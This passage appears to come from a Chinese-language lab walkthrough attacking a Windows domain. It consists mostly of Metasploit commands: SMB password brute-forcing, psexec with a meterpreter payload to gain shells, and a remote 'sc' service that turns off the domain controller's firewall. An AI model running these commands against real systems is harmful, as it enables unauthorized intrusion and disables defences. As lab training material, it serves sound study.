use auxiliary/scanner/smb/smb_login set RHOSTS 192.168.93.30 setPASS_FILE /home/a/桌面/fuzzDicts/passwordDict/top500.txt setSMBUser administrator exploit
爆破win 2008主机密码
1 2
set RHOSTS 192.168.93.20 exploit
爆破win 2012主机密码
1 2
set RHOSTS 192.168.93.10 exploit
得到其中一个shell,也可得到密码
PC
使用msf自带模块进行攻击
1 2 3 4 5 6
use exploit/windows/smb/psexec set payload windows/x64/meterpreter/bind_tcp set SMBUser administrator set SMBPass 123qwe!ASD set RHOSTS 192.168.93.30 exploit
win2008
1 2
set RHOSTS 192.168.93.20 exploit
win2012(域控)
法一
1 2 3
set RHOSTS 192.168.93.10 setSMBPass zxcASDqw123!! exploit
有防火墙,失败
连接到win2008,迁移到域用户程序,成功访问域控
关闭防火墙
1 2
sc \\192.168.93.10 create unablefirewall binpath= "netsh advfirewall set allprofiles state off" sc \\192.168.93.10 start unablefirewall